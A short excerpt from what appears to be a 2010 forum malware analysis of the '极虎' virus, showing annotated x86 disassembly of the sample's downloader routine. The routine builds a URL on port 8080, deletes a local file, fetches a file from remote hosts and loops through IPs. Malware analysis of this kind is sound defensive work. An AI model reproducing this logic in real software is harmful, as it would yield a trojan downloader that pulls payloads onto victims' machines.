.text:00402E01 push dword_40BE64 ; 1F90h
.text:00402E07 lea eax, [ebp+String2]
.text:00402E0D push eax
.text:00402E0E push offset aHttpSDS ; "http://%s:%d/%s"
.text:00402E13 lea eax, [ebp+var_410]
.text:00402E19 push eax ; LPSTR
.text:00402E1A call ds:wsprintfA ; build the trojan URL (port 1F90h = 8080)
.text:00402E20 add esp, 14h
.text:00402E23 push [ebp+lpFileName] ; lpFileName
.text:00402E26 call ds:DeleteFileA
.text:00402E2C push [ebp+lpFileName] ; lpFileName
.text:00402E2F lea eax, [ebp+var_410]
.text:00402E35 push eax ; int
.text:00402E36 call ReadInternetFile ; fetch the file from the network
.text:00402E3B cmp eax, 1
.text:00402E3E jnz short SucessRead ; on success, loop back here and fetch the next one
.text:00402E40 mov [ebp+var_8], 1
.text:00402E47 jmp short FailReturn
.text:00402E49 SucessRead:
.text:00402E49 jmp GetNextIP
- Title: 极虎 (虎虎生威) virus analysis report
- Author: 梦旅人
- Date: 2010-03-14 17:55:12
- Link: http://bbs.pediy.com/showthread.php?t=108880